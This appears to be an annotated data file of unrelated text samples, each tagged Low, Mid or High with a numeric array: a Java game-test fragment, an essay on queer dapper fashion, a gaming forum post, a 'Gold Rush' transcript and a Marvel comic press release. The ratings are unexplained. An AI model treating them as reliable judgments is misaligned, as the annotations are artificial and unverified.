(keyPressed) { TerrainGridTileLoaderTest.this.down = true; } else { TerrainGridTileLoaderTest.this.down = false; } } else if (name.equals("Jumps")) { TerrainGridTileLoaderTest.this.player3.jump(); } else if (name.equals("pick") && keyPressed) { //Terrain picked = terrain.getTerrainAt(player3.getPhysicsLocation()); Terrain picked = terrain.getTerrainAtCell(terrain.getCurrentCell()); System.out.println("** cell "+player3.getPhysicsLocation()+" picked terrain: "+picked); } } }; private final Vector3f walkDirection = new Vector3f(); @Override public void simpleUpdate(final float tpf) { Vector3f camDir = this.cam.getDirection().clone().multLocal(0.6f); Vector3f camLeft = this.cam.getLeft().clone().multLocal(0.4f); this.walkDirection.set(0, 0, 0); if (this.left) { this.walkDirection.addLocal(camLeft); } if (this.right) { this.walkDirection.addLocal(camLeft.negate()); } if (this.up) { this.walkDirection.addLocal(camDir); } if (this.down) { this.walkDirection.addLocal(camDir.negate()); } if (usePhysics) { this.player3.setWalkDirection(this.walkDirection); this.cam.setLocation(this.player3.getPhysicsLocation()); } } }
Low
[ 0.5275590551181101, 33.5, 30 ]
These essays were inspired by Kate/Kade’s Butch Please article, Butch Gets Dressed. by Anita Dolce Vita, dapperQ Managing Editor “Style is a simple way of saying complicated things.” This quote, which has been attributed to French artist Jean Cocteau, really reflects much of what we are trying to convey through our work at dapperQ, a fashion and empowerment website for the unconventionally masculine. dapperQ, similar to other queer blogs today and that have come before, has been criticized because some feel that having a fashion focus is “consumerist” and/or “superficial.” But, as Cocteau’s quote so brilliantly points out, our clothing is symbolic, a mode of non-verbal communication that helps us convey complex things to others about who we are as individuals, about our cultures, about our societies; in a way, clothing/fashion/style is a language. (Yes, these three concepts are different, but we are speaking more generally here.) We hope to move beyond talking simply about brands and trends to opening up a dialogue about how and what we communicate non-verbally via our clothes. Or, as Elisa Glick points out, “…gay style is not seen as an abandonment of politics, but rather the site of political engagement.” According to the New York Times, the growing scientific field of “embodied cognition” has revealed that “we think not just with our brains but with our bodies….and our thought processes are based on physical experiences that set off associated abstract concepts. Now it appears that those experiences include the clothes we wear.” So, fashion/style/clothing as a language (or part of a larger language), not only communicates many things to external observers, but also impacts how we perceive ourselves. dapperQ recognizes that clothing/fashion/style, like a spoken or non-verbal language, is not created in a vacuum. It impacts and is impacted by cultures, societies, and a world full of love, hope, creativity, regional nature, and wildly beautiful human diversity and simultaneously full of hate, misogyny, racism, classism, homophobia, transphobia, fat-phobia, and many other isms/phobias. Thus, the motivation behind why one individual decides to dress the way they dress is not black or white. ADVERTISEMENT There are many reasons why a particular individual dresses the way they dress. Yes, one reason may be to emulate the dominant culture in an effort to gain acceptance or fit normative expectations. But that may not always be one of many reasons that an individual chooses a particular style of dress/clothing. Other reasons may include using style as a form of protest; claiming or reclaiming a specific style of dress; adopting a style of dress to express individual personality; choosing clothing that fits well or is functional; using clothing to expand the definitions of race, class, ethnicity, gender, and sexuality; etc. Whatever the reasons, the clothing always carries a message, be it intended or unintended. The goal of our website has always been to provide much needed visibility, resources, and role-models for masculine gender-queers, or anyone else who has been told by society that menswear and masculinity is “off limits” to them. We emphasize that there is no right way of being dapper. Our readers have a broad range of style icons that inspire them: Rachel Maddow, David Bowie, Kanye West, James Dean, Murray Hill, Ellen DeGeneres, Justin Bieber, Pharrell, Mick Jagger, Frank Sinatra, Rocco Katasrophe, A$AP Rocky, and, yes, even the consummate dandy dapper Janelle Monae, to name a few. In a recent Butch Please post on Autostraddle, Kate provided a personal critique of the dandy dapper queer aesthetic, stating: “If butchness and butch desirability has its own power structure, dapper butch is at the top, which makes sense in a twisted and sad way when you think that rich educated white men, the thing that dapper butch is meant to emulate (either ironically or not – in so many cases I think a critical commentary is no longer in play or being utilized) are at the top of the macro version of that power structure. Like so many other parts of queer masculinity, dapper feels good. It feels good to dress dapper because I know I will be immediately accepted by queers and non-queers alike. I know I will be considered attractive, I will be able to navigate queer spaces with complete ease, and my masculinity will not be questioned.” It is true that in some corners of the U.S., the dapper/dandy aesthetic is the queer style du jour. And, while Kate’s personal experience deserves to be respected as valid and true to Kate, it does not represent all of the experiences and perspectives of those who dress dandy dapper queer. Many of our readers have actually been shunned, rather than “immediately accepted,” for dressing dapper – not just for dressing masculine, but specifically for dressing dapper. Some of our contributors and readers of color have been harassed and have had their race, ethnicity, and/or masculinity called into question by members of their community, both straight and queer, for dressing “too bougie,” claims that only perpetuate normative stereotypes that there is only one right way of dressing if you’re a POC. One reader recalled visiting home for holiday and being laughed at by her AG friends because her perfectly tailored button-down shirt was “too tight” in their opinion; they immediately took her to the mall to purchase some sagging jeans and an oversized t-shirt. This reader went along with it because she didn’t want to be considered a “sell out.” Another reader shared a story about how her partner had asked her to dress less dapper when going to meet her partner’s friends for the first time because dressing too dapper might impact their “street cred.” These experiences are not isolated to QPOC by any means. We have had countless conversations with both QPOC and white-identified dapperQs who purposely “dress down” or change their dapper styles to fit the hipster aesthetic that is so popular and at the top of the power structure in queer communities in larger cities like New York. A reader sent us an e-mail asking where she could find skinny jeans that fit her curves, not because she liked wearing skinny jeans, but because she felt pressure to dress more hipster when she went out to queer bars, even though she preferred the way that a pair of relaxed khakis fit her body and the way that a bow-tie, rather than a sleeve of tattoos, reflected her nerd-cool personality. Conversely, many of our readers have been empowered by dressing dapper, not because they found acceptance by emulating the dominant culture, but for some of these and other previously listed reasons about why individuals might dress the way they dress: because it is a form of in-your-face protest; because there is now increased access to a form of performance art that had been previously denied to them; because they may find a blazer and slacks to be more flattering on their shape than a tank and skinny jeans; because they have professional jobs that call for business attire and will no longer tolerate wearing a skirt to work; because it defies racial stereotypes; because they enjoy thrifting for one-of-a-kind vintage pieces; because they identify more with the academic dapper afro + suit + tie look of Cornel West than the homogenous faces in Tiger Beat; and so on and so forth. Dandy has gone through various incarnations from its origins in 18th century Britain to modern day interpretations, as documented in RISD’s Artist/Rebel/Dandy exhibition featuring the stylings of a diverse range of icons including W.E.B. Du Bois, John Waters and Patti Smith. Each manifestation brings new voices, new perspectives, new interpretations. For example, in her book Slaves to Fashion, Barnard Collage Associate Professor Monica L. Miller documents the unique history of black dandyism. andré m. carrington’s review of Miller’s book notes, “the black dandy also furnishes indispensable varieties of female masculinity with which to style the revolution… DuBois suggests, as a black dandy patriarch, that black and darker peoples might freely choose to love and enjoy modes of dress and self-presentation that feminize men and masculinize women, much to the consternation of critics who would strip his peculiar wedding of aesthetics and politics of its decisively racial accoutrements.” Queers too have played and continue to play an important role in these new manifestations, expanding the definitions of dapper, pushing its boundaries, and contributing to its ever-changing history. Elisa Glick’s Materializing Queer Desire notes, “The queer black dandy’s rebellion against the culture of capitalism gives birth to a new aesthetic that combines the naturalized simplicity and vigor of primitivism with the artifice of decadence – making legible a distinctly African American incarnation of the new forms of desire, identity, and community emerging in modern, urban culture.” Furthermore, Glick acknowledges that lesbian artists, such as Renee Vivian, Romaine Brooks, Natalie Barney, and Radclyffe Hall “drew upon the traditions of dandyism and decadent aesthetics ‘as part of a desire to make a newly emerging lesbian identity publically visible’” and explains that the lesbian dandy has been “conceptualized in opposition to the sterility and uniformity of mass culture, even as she is portrayed as the quintessentially modern, new woman.” The Economist author N.L. said of the various interpretations of punk style, “But the point, always, is to flout convention. It is a way to tell the world what you think of it without ever saying a single word.” This can be true of rebel style in general, and for many, dressing dapper queer is rebelling, rather than conforming. So, what does it mean for a queer to rock a bow-tie? It depends. A bow-tie can take on a variety of meanings and can be perceived as negative or positive, empowering or oppressive, depending on the culture or subculture. The embodied cognition study published in the New York Times also found that “If you wear a white coat that you believe belongs to a doctor, your ability to pay attention increases sharply. But if you wear the same white coat believing it belongs to a painter, you will show no such improvement.” Same coat, different meaning… Next: Dapper Became Me Pages: 1 2See entire article on one page
Mid
[ 0.6224256292906171, 34, 20.625 ]
I do actually have a funny shaped head. Not quite as bad as Aggro, but it is a little odd. The girl who cuts may hair never lets me forget it either. Guys, I played the demo for Call of Juarez: Gunslinger and loved the shit out of it. I am pretty sure I am going to buy it tonight. Anyone else enjoying it? Happy Wednesday, Javis
Low
[ 0.50319829424307, 29.5, 29.125 ]
"What are you going for?" "3,000." "you're 21 years old, man." "I thought you would go For like 10,000 ounces." "I'm a real underachieving 21-year-old." "That's for sure, todd." "On this "Gold rush"..." "Just know now That we're gonna do 3,000 ounces" "And not an ounce more." "Can you build a bigger one?" "I'd love to bump our goal Up to 4,000 ounces." "It." "Let's do it, man." "What do you say?" "Why not?" "right now, we're standing On a big-ass sail." "Can feel the wind Pullin' this thing." "whoa!" "broke loose!" "Not here to ruffle Any feathers or anything." "are you gonna let me Run the dredge a bit more?" "Captions paid for by Discovery communications" "six months ago," "The hoffman crew Left mckinnon creek" "And the klondike for good." "Just go for it." "But now they're back..." "Comin' up, sheamus." "...To dismantle monster red" "And take it 2,000 miles south," "To oregon." "clear one?" "yeah, clear." "Let her down." "Their first oregon operation" "Has so far produced" "A disappointing 50 ounces." "I don't know why The high bar isn't producing." "We tested it." "Something's going on." "I don't know what." "So they've opened up" "A second mine, the buckland." "And they need a wash plant." "didn't think we were Gonna need monster red." "But it looks like we're gonna." "So we'll get it, Break it apart," "Get it down there, See what happens." "I got to get This plant to oregon." "We got to get sluicing." "We're running out of time." "So we still got A couple big pieces" "That we got to get out of here." "We got that screen deck." "That's gonna be a huge piece." "sheamus, When we go to pick this," "I want to tighten These cables up." "I want to double-check And look at every pick point." "Roger that." "That sounds like A good idea, fred." "todd has drafted" "Klondike mine boss Sheamus christie and his crane" "To take apart The 100,000-pound plant." "This wind's Getting worse and worse." "Yeah, the wind is bad." "I'm nervous." "But, let's Get hooked up," "Try it, and put Some weight on it." "Freddy, you ready?" "Let's go." "Right now, we're standing On a big-ass sail." "You know, it's 20-some feet long, 6, 7 feet high." "You know, put a sail That big out," "See how much wind it catches." "Let's give it heck, sheamus." "Does it even move, fred?" "All we've done so far Is take a little cushion" "Out of the springs." "Yeah." "It's coming off over here!" "We're moving." "It's coming up." "I can feel the wind Pulling this thing." "Come on, baby." "Come on." "easy." "freddy, how's it look?" "When he clears the stand, We ought to have him come down." "Looking good, todd, Looking good." "Nearly there!" "Yeah!" "the screen deck Is safely stowed." "All that's left is To remove the shaker stand." "For the past 2 years, There's been over $5 million" "Worth of gold washed" "Right under where my feet are And end up in those sluices." "This is why we came here." "This is the most Important part." "We can't screw this up." "this whole trip Is about this part here." "It's pretty much priceless." "And -- and it's custom, Can't just go out" "And buy something Like this in short order." "How much do you think This thing weighs, fred?" "with all those chutes And the catwalks" "And stuff on it, Probably 25, 30." "Let's do it!" "6,000. 7,000." "8,000." "We're at 10,500." "15. 16." "17. 20." "23." "25." "Has it even budged?" "Hasn't even Moved an inch." "Keep hitting it." "I'm at 36,000." "I don't know, todd." "I don't Think it should be this heavy." "the crane is pulling At least 6,000 pounds more" "Than the weight Of the shaker stand." "Still, it won't budge." "What do you want To do, sheamus?" "Holy frick." "I'm just headed back, Get started for the year," "Helping tony move This other dredge." "gene cheeseman is back" "For his second season" "As tony beets' foreman." "it'll be good to do A challenging project," "Something new, Something different." "Not too many people Get to do that." "his mission " "Take apart tony's 500-ton Second dredge," "Transport it 150 miles," "And bring the ancient Gold machine back to life." "we got to barge it Down the yukon river." "So that's another challenge." "There's gonna be some Learning curve with that." "Looking forward to getting Started on the project." "That's why I'm here." "he hasn't been Around here much, has he?" "Well, he hasn't changed." "Let's put it that way." "Yeah." "Good, tony." "Yeah." "hi, gene." "hi, minnie." "Well, I had to Bring something." "Well, next time Bring something better." "Yeah." "Should be fun, I guess." "You being here, It will hurry things along." "well, yeah." "no, I'm ready to get going." " I knew you'd be ready." "awesome." "So what're you both Sitting here talking?" "I want to move that dredge Is what I want to do." "Yeah." "in the offseason," "Tony beets bought Two old tugboats" "To haul the dredge Down the yukon river." "Yeah." "Yeah." "Yeah." "We're gonna have to take That all apart anyways." "So I don't know." "I guess " "Yeah." "instead of starting On the second dredge," "Gene has to turn A pile of scrap" "Into a fleet of working tugs." "You know, we got wiring, Fuel tanks." "None of the cooling lines Are hooked up." "I need to go, make A few phone calls here" "About some of the controls And stuff." "It's kind of endless, you know?" "You look at the huge," "Big picture of things, It looks overwhelming." "okay." "I'm gonna go work." "Go to hell." "Go ahead and fire up That, 800" "And bring it over and tap it." "the hoffman crew is Taking its $360,000 wash plant" "South to their new Operation in oregon." "It's stuck right now." "It's not lifting it." "but the shaker stand Is stuck fast" "In the frozen klondike dirt." "Freddy dodge has a plan..." "They're gonna grab that 800 And try to get it out of there." "...Try to nudge loose One corner of the stand" "To give sheamus A better shot at lifting it." "Push out!" "Push out on the arm!" "There you go." "Whoa!" "Talk to me!" "Dig in And roll it this way." "Roger." "See if you can Get a better angle." "Yeah." "It's broke loose." "Okay." "Let's see if we can Lift the old girl." "We're gonna try to get The bucket underneath there," "Jiggle it a little bit While sheamus is pulling." "28. 29." "30,000 pounds." "There." "It's starting to move." "perfect." "yeah!" "Good job, sheamus!" "Yeah, looks like 30,000's the number." "I hate permafrost." "Just a little reminder Why I went to oregon." "Now one problem " "I got to find The frickin' gold." "We're making awesome progress." "A little bit smaller crew, But we're motoring right along." "I just hope we can keep this up For the rest of this season." "at scribner creek," "Parker schnabel is on the gold." "His new wash plant, sluicifer," "Has produced A healthy 126 ounces" "After just 4 days running." "it was surprising To see that much gold." "If this cut keeps going," "Like this little indication Shows right now," "We'll -- we'll hit our 3,000." "but parker's capping His target at 3,000 ounces," "The same as last year." "We're, um, at a bit of a limit" "Because tony's royalties are " "Start to really kick in And hit pretty hard." "Over 3,000 ounces," "We have to pay 25% royalty." "We need to make money this year." "We might be able to do As much gold as we did with," "You know, 12 or 14 people Last year" "With only 6 or 7 this season" "Because we're mining good And cheap and efficient." "You know, if I was doing it, I'd definitely have," "Some more hands on deck there." "But I know parker Doesn't want to have," "Any expenses," "Just wants to have the profit." "Hey." "Do you have about an hour?" "There's something I want to go show you." "Okay." "Give me a second here." "With fewer operators," "Parker's looking at ways Of moving dirt more efficiently." "So where are we going?" "Well, I met this guy" "That mines Down here on dominion." "He's custom built And designed these conveyors" "That he uses, actually." "To move all his dirt?" "Yeah, everything -- mud, Overburden, gravel, all of it." "You know, he just runs A three-man operation." "Wow." "So, those Are what he uses." "What the hell?" "That's one frankenstein Machine right there." "Yeah, they're pretty sweet." "You're moving everything 120 feet away from you." "I'd have to see one Running." "this machine Is the brainchild" "Of klondike innovator Adrian hollis." "Hi, parker, How you doing, buddy?" "good." "How are you?" "good." "good to see you." "yeah, the same." "this is rick." "hi, rick." "how you doing, buddy?" "he's our foreman." "okay." "Well, this is what we do." "This is how We move dirt here." "This thing puts up about 400, 500 yards an hour." "It's a cheap way To move dirt." "So this whole cut, Nothing but this conveyor." "nothing but this conveyor." "wow." "In fact, this cut is actually, 4,000 feet long." "The 130-foot mobile conveyor" "Sits on top Of an old excavator." "A single operator loads Overburden into the hopper." "The conveyor Then shifts it 120 feet up" "And out of the cut." "As soon as he finishes In one area," "The operator simply moves The whole machine" "And starts the process again." "You don't have Any other crew" "Other than one guy Feeding this thing?" "No, just one guy." "He just runs around, And he feeds this." "He just comes down here." "We just send him off With some pork and beans." "And he gets at it." "and the conveyor uses" "A fraction of the fuel" "Burnt by a fleet Of rock trucks." "So what's This thing cost to run?" "We generally Looking about, like," "Between $1,000 And $1,200 a day." "And you're moving 4,000 yards a day?" "Sometimes more." "Generally calculate All that costs" "On about 30 cents a yard." "That's 1/3 Of what we're at." "You can be On marginal ground." "And it doesn't have To have much gold in it." "And you're looking pretty sweet At the end of the season." "Pretty impressive." "Would you be willing To help build us one?" "If you can supply The guys and the material," "Then I'll look after it." "And we'll see If we can make one work." "So, what " " I guess I need an excavator" " to put this thing on?" "you certainly will." "Depends how big You want to make it." "Do you want to make a big one Or a little one?" "Can you build A bigger one?" "Well, if you got An old 700 sitting around," "I would say you wouldn't have A problem with 150 feet." "Thanks, adrian." "Thanks for your time." "no problem, son." "I appreciate it." "thanks a lot." "yeah." "it was great meeting you." "yeah." "all parker needs" "To start building His own super conveyor" "Is an excavator." "Yeah." "I think it could really Change our operation." "It could change A lot of things at our site." "I think it could make us A lot more efficient." "He's the mastermind Behind this." "So if he's willing to help," "Then I want To get one built." "We appear to be Good and going." "Kevin beets is at the helm" "Of his father's old dredge." "We are a-dredging." "That's not too bad." "in just the first 3 weeks of the season," "Kevin has produced 536 ounces of gold," "Worth well over $600,000." "Gonna drop my bucket Right down to a belt level." "And off we go." "That's nice bedrock." "There's been tons Of bucket line slippage today 'cause it's worn Right the out." "Now I am not moving at all." "even though the dredge Is producing good gold," "A slipping bucket line Has been slowing it down." "It's been An ongoing issue for " "Since we started." "Okay." "You stop." "You guys stop." "Well, I've shut it off Because it was about" "A minute of the bucket line Not moving at all." "It was like it was stuck." "So it kept turning up on top." "But the buckets Weren't moving." "That was grinding The absolute" "Out of the sprockets." "I can't dig that section." "It was pretty clear." "So no point in Beating the" "Out of the poor dredge" "Trying to get the ground When I can't dig it." "the bucket line Works like a bicycle chain" "Which is driven by a drive cog." "Wear plates on the wheel" "Act as teeth that engage The bucket line." "Over time, the wear plates Have worn down," "Which means the bucket line" "Is losing it's grip and slipping" "Whenever it has To dig the harder bedrock." "We know there's Some gold in this bedrock." "So we're missing out." "every time The dredge hits bedrock," "Kevin repositions it to mine Shallower, softer ground." "Shut down for 5 minutes," "Swing to where you need To go, and go from there." "Here comes tony." "It could be better." "Watch out." "sprockets on the bucket line..." "yeah?" "The wear plates, Those things are" "They're supposed to be square To catch the bottom" "They're all worn down." "Instead of being this thick, They're this thick." "That's causing The bucket line to slip." " yeah." "because of that," "We can't dig Worth a" "I want to pull these ones off, Get the new ones we had made," "Bolt them in, Weld them in, done." "Yeah, we don't Need gene for that." "I can direct welders, too." "It's basically my job here, too, 'cause part of the people " "it's three bolts." "yeah, yeah, yeah." "Yeah, yeah." "There's no Rocket science there." "Well, yeah." "But I can do that, too." "All right." "What can you do?" "It'd be really nice To get that fixed" "So we can actually dig again." "because he can't dig The gold-rich bedrock," "Kevin has to settle For lower-grade material." "tony wants to wait For gene to show up" "Before we can fix those." "I mean, he is the big boss." "So he gets to make The big calls." "I know I'm supposed to be Running the dredge." "Doesn't mean I get to." "Okay." "just drop 'em." "heads!" "heads!" "monster red Is finally loaded up." "good job, jack." "you bet." "Good job, fred." "thanks, man." "right on, guys." "thanks for helping us." "and the hoffman Crew can start" "The 2,000-mile journey home" "And try to salvage their season." "Away we go, back to oregon," "Right into the buckland." "I'll be damned." "parker, how you doing, man?" "not too bad." "how are you?" "all right, man." "Tired." "How's your summer going?" "Well..." "I don't know." "It hasn't Started off real great," "If you want To know the truth." "Just here getting The plant." "That's it." "Trying to liquidate What I have." "I got a hell of a yard sale Going on." "You needing anything?" "What do you want For that excavator?" "Well, make me an offer." "Let me have mitch Take a look at it." "And we'll just Put a value on it" "And go back and forth From there." "But we do need A bigger hoe like that" "For a project We're working on." "It's all yours, buddy." "I heard you're Going for 5,000 ounces." "yeah, I am." "that's a lot of gold." "Yeah." "What are you going for?" "3,000." "Just doesn't make sense" "With our royalty rates, You know?" "You're 21 years old, man." "I thought you would go For like 10,000 ounces." "I'm a real underachieving 21-year-old." "that's for sure, todd." "well, there you go." "What do you think?" "You've achieved everything 'cause you get a little gold In your pocket?" "did I say that?" "sounded like it." "No." "You tell me, man." "I'm only 47 years old." "What would I know?" "I just got finished Burying my grandpa." "You don't need to tell me Like that." "I don't know." "You know, I don't need that" "Come on!" "See you." "See you later." "Let's get out of here." "it will take The convoy 2 1/2 weeks" "To make its way To the new claim." "we need to get Monster red down to the buckland" "And start making some gold." "I'm gonna miss this place." "But my future isn't In the klondike." "Parker can have it." "hey, gene." "kevin." "you made it in." "Yeah." "How's it going?" "You know, Breaks." "Yeah." "Gene cheeseman has been sent" "To oversee a repair" "On the dredge's bucket line." "So I'm guessing You're here for the " "Yeah." "I got to look At the tumbler here" " and see, what's -- -what's up?" "What's up with that, Just figure out a plan." "We noticed it began To slip about a month ago." "I've been trying to get On tony's case" "To let us replace them." "But he really wanted to wait For gene, for some reason." " gene isn't needed here." " he's got better to do." "He should be on dredge Number two today." "For weeks, kevin and jason" "Have been wanting To make the fix themselves." "You guys are all big boys." "I don't think you need me Out here, but " "We kind of knew what was gonna Have to be done there, so..." "Not here to ruffle any feathers Or anything, so..." "I don't think We need a babysitter, so..." "No." "And I'm not Trying to do that." "So I don't want you To feel that way." "Yeah, we'll be good." "Yeah." "okay." "all right." "We could have fixed this problem On our own with the bucket line." "We have the welders here." "We have the wear plates." "Everything was Available to go," "And we were just waiting For the go-ahead from tony." "And he insisted On waiting for gene." "Yep." "We're just looking At the sprockets." "He can get started On the sprocket today, right?" "nowhe'sin arush." "Okay." "Phil's working on the bucket." "Jason and bob just Finishing cleaning out" "The hydraulic riffles For under the trommel." "Jason finished up Greasing the bucket line." "I can do that, yep." "Gotcha." "It's no different Than your bicycle chain." "If your teeth are screwed up On your bicycle chain," "Your chain skips." "That's all this is, Is a chain." "And it's skipping 'cause The sprockets wore out." "Now you got to Change those out." "These guys look like They got it figured out" "And doing a good job." "You know, I want to go move dredge two." "That's what I want to do." "It's what I'm interested in." "while gene Supervises the repair," "Dredge master kevin Pulls the mats" "To take home to tony as ordered." "tony's always Gonna micro-manage." "Doesn't matter if the cleanups Are good, bad, or great." "That's how he operates." "So you just learn to work With it like a natural disaster." "You don't just yell At the hurricane." "You wait for it to pass, Then you pick up the pieces." "I'll take this off to paradise" "So he can jig it, clean it." "Then we can see what we got." "I did a pan." "kevin has been Summoned home by his father," "While gene cheeseman oversees A repair on the dredge." " not too bad." "yeah?" "There's a lot Of material." "So there should be hopefully A lot of gold in that." "Yeah, yeah." "So if this turns out good..." "Are you gonna let me Run the dredge a bit more?" "No, that's not What I'm meaning." "I'm talking about, like, Letting me manage it." "Well, like With the sprockets" "on the bull gear." "yeah?" "'cause gene's plan Is the exact same plan" "I told you a month ago." "yes." "Are you gonna give me More responsibility" "And let me Make the call " "That when I say, "I want to fix this now."" "We can fix The thing." "Okay." "But when I say, "Is it time?"" "Will you listen?" "yippee." " okay." " finish this up." "He should know he can trust me To keep running," "That I don't need Someone to hold my hand" "Every time I decide To go left or right." "That's what he should Trust me with." "I'm getting Pissed off with this." "Todd hoffman really Irritated me the other day" "By saying we're, like, Some sort of slackers" "Only going for 3,000 ounces." "parker is on his way To see tony" "In a last-ditch attempt To improve his royalty deal." "truth of the matter is After 3,000 ounces," "We just -- we can't afford To pay a 25% royalty." "At the end of the day, This is a business." "We're stuck at 3,000 ounces" "As long as we're Leasing from tony." "And as long as he keeps Taking the same position he is." "For the last two seasons," "Parker has repeatedly tried And failed" "To renegotiate the deal With his claim owner." "well, let's, Give this a shot." "knock, knock." "hey, parker." "hi." "hey." "haven't seen you yet this year." "I know." "Sorry to hear About your granddad." "Thanks." "Hi, tony." "How you guys doing?" "We're good." "As good as can be, anyway." "You bringing us goodies?" "I am." "100 ounces for you." "Well, we just did 126" "Out of our first cleanup, First 4 days." "so that's good." "that pretty good." "And, I figure I'd get you out of my hair" "And just give you the minimum Royalty up front here." "Yeah, not bad." "Off the back of that, You know," "That's our minimum Royalty payment." "Yeah." "We're really stuck on Our maximum of 3,000 ounces" "With these royalty rates The way they are." "I mean, all I'm asking for" "Is to cap the royalties At 20%." "We can go for 4,000 Or 5,000 ounces," "Which would put -- You know, 20% " "That'd put 200 to 400 More ounces in your pocket." "That way, we can just Keep on chugging." "And it makes it Worthwhile for me to do." "And you guys keep getting More gold out of the ground." "At then end of the day, Something needs to change, 'cause I'm really Not up here" "To just every year Do 3,000 ounces or less." "Well, if that's the way It's gonna be," "Just know now that We're gonna do 3,000 ounces" "And not an ounce more." "Are we really Gonna stick to that?" "I think we should Talk about it." "Well, you got to do something, 'cause he wants to work." "How many people this day And age want to work?" "I don't want you to do that." "I mean, there should Be options, right?" "Let him bring the gold." "what's up?" "Yeah, we have our one From last year still," "big red." "good." "tony's offer Allows parker to mine" "Another 3,000 ounces At the lower rate" "As long as it's on A second claim." "Yeah." "I mean, I wasn't planning" "On having two operations Going this summer." "But I appreciate The compromise." "Right?" "Maybe you're not Such a bad guy, tony." "Thanks, tony." "That's a bit unexpected." "I really wasn't, thinking That was gonna happen." "This is pretty late To start a project like that." "Like, running a second operation In a second plant is, " "It takes a lot Of infrastructure, right?" "Do you have generators And pumps" "And feeders and loaders?" "And a lot of stuff That goes into it." "it looks as though You've brought me" "a machine, mate." "yeah." "parker has made A deal on todd's 700 excavator." "He can now have adrian build him" "A brand-new super conveyor." "looks good." "it's a little beat up." "It came from the hoffmans." "Well, it looks As though it's nothing" "That can't be repaired." "No, I'm really Lookin' forward to it." "Five weeks Should just about do it." "And you're in business." "Geez." "That's a lot of work." "you come have a look." "You tell me." "The beets family assembles" "For the third gold weigh Of the season." "Faulty wear plates On the dredge have meant kevin" "Has struggled To dig high-quality pay." "Now, they will find out How much it's cost them." "there she is." "30." "40. 50. 60." "70. 80." "90." "110. 130." "140. 160." "170." "No." "Right?" "despite the Slipping bucket line," "Kevin has brought in $260,000 in A single week." "yeah, it's hot." "it's hot." "no touchy." "Yeah, I think We could've done better, though," "If you had let me Fix those wear plates" "Way the back when." "wah, wah, wah." "no, no, no." "see -- -no wah, wah, wah." "We could've got a lot more." " he's got a point." "yeah." "I appreciate you" "Wanting me to, you know, Be involved in doin' it." "But I think kevin's More capable of doin' it." " well, I'm tryin' to be." "okay." "7568." "That's more than We had all last year." "yes." "Kevin does have A point though." "Tony has to let Go a little bit." "The less people Trying to make decisions," "The better." "It's like anything." "Work by committee Doesn't happen." "So here I am, gonna make it Work this year." "let's fry that up And put it on the table?" "30 miles south," "Parker schnabel Is also in his gold room," "Ready for his second Boundary cut weigh in." "all right." "Let's see what this is." "their first weigh-in" "Of the season was 126 ounces." "Here's 20." "60." "120." "140." "145 on the button." "whoo!" "nice." "yeah." "145 ounces, That's a good cleanup." "That's worth nearly $175,000" "And takes his total So far to 271 ounces," "Well on target For his season goal." "You know, I keep bugging tony" "About our royalty rates." "And, um, this week," "He did make a bit Of a compromise" "In that he said the only way We're gonna get away " "Around the royalty rates is," "We can run A second wash plant." "And it will reset at The original royalty rates." "Really?" "It's got to be A different plant," "A different plant On a different cut," "And be independent Of the other operation." "So each plant Pays its own royalties?" "yeah." "wow." "It starts Back at 15%, right," "And then Works up from there." "We've got that ground On indian river from tony" "That we got last year." "And we have yet To touch 'em at all." "I mean, it's all still Trees and swamp." "I'd love to bump our goal up To 4,000 ounces" "And try to do 1,000 Ounces down there." "I mean, if you want this, rick, I'm putting it on you." "You've got to want to do it." "And you've got to take it on." "And it's not gonna be easy." "So it's on you." "It." "Let's do it, man." "What do you say?" "Why not?" "let's give it a try." "yeah." "Hell yeah." "What are you thinking For a wash plant?" "Um, probably big red." "I know when we parked it, It was pretty tore up." "Sounds like you got Yourself a project, mitch." "Yeah." "That's it, man." "We're goin' big." "Let's get after it." "Get a steady flow of gold Down to that room?" "going big, mitch." "yeah." "You know, we're gonna go For 4,000 ounces." "This is our year to go big." "Trying to get another 1,000 with big red," "Probably not The easiest way to get there." "But if that's what we got to do, That's what we're gonna go do." "Parker saying It's all on me." "Well, it's kind of what I've Been thinking about, you know?" "What it would be like." "And so I " "I'm pretty excited about that." "And I'm getting more excited By the second now," "Um, 'cause I didn't really See it happening any time soon." "But now it's -- it's pretty much Being laid before me." "And I've got A huge opportunity now." "Yeah." "I guess we're starting A second operation." "Not really what I had in mind." "But," "Hey, gold price is good." "Fuel price is cheap." "So now's the time to be pushing For everything we can." "whoa." "Whoa." "Whoa!" "Rick's going under!" "on the next "Gold rush"..." "Gonna be the hardest Thing we've ever done." "You're losing Thousands of dollars a day." "We're not mining." "We're just wasting time." "Unless I see Something really screwed up..." "whoo." "..." "Rick's the boss." "You're kidding me." "It's just not gonna thaw." "Kevin, You're in trouble!" "supposed To be mining gold." " you don't like it?" " too bad." "Everybody has A breaking point."
Mid
[ 0.6333333333333331, 38, 22 ]
Your First Look At The Landmark HULK #50 Press Release Marvel is proud to present your first look at, Hulk #50, from the critically acclaimed team Jeff Parker and Carlo Pagulayan. Red Hulk’s hostile encounter in Las Vegas during Circle of Four is coming back to haunt him! The end of the world may be upon us, but that’s not all that’s headed for Red Hulk; "The Red Hulk didn’t get out of that Venom story unscathed,” explains Jeff Parker. “Something followed him out of hell and it’s going to make the supernatural territory of Marvel break open and swallow our anti-hero whole!" The stakes grow even higher, as a mysterious figure lurks in the shadows waiting to destroy Red Hulk and his fellow comrades! Will Red Hulk’s might be enough to match ghoulish malevolent magic? Can the help of Doctor Strange, Iron Man, Daredevil and more aid Thunderbolt Ross? Find out in the bonus-sized issue- Hulk #50, hitting comic shops everywhere and the Marvel Comics app, this April! "This arc puts Red Hulk in the paranormal hot seat,” adds Marvel Comics Senior Editor Mark Panicca. “Hulk #50 is a gamma-powered, poltergeist-packed issue that’s a joy ride through Marvel’s darkest side." No fan can miss this explosive landmark 50th issue providing readers with a perfect jumping on point, as Red Hulk combats a supernatural threat unlike any he’s ever faced before! With variant covers by Walter Simonson, Arthur Adams, & Humberto Ramos AND a 10 page back up by fan favorite artist Dan Brereton – this is a must have! HULK #50 (FEB120598) Written by JEFF PARKER Art by CARLO PAGULAYAN & DAN BRERETON Cover by CARLO PAGULAYAN Variant Covers by WALTER SIMONSON, ARTHUR ADAMS & HUMBERTO RAMOS Blank Cover also available FOC – 3/12/12, ON-SALE 4/4/12 – The Comic Book Critic
High
[ 0.7027027027027021, 32.5, 13.75 ]
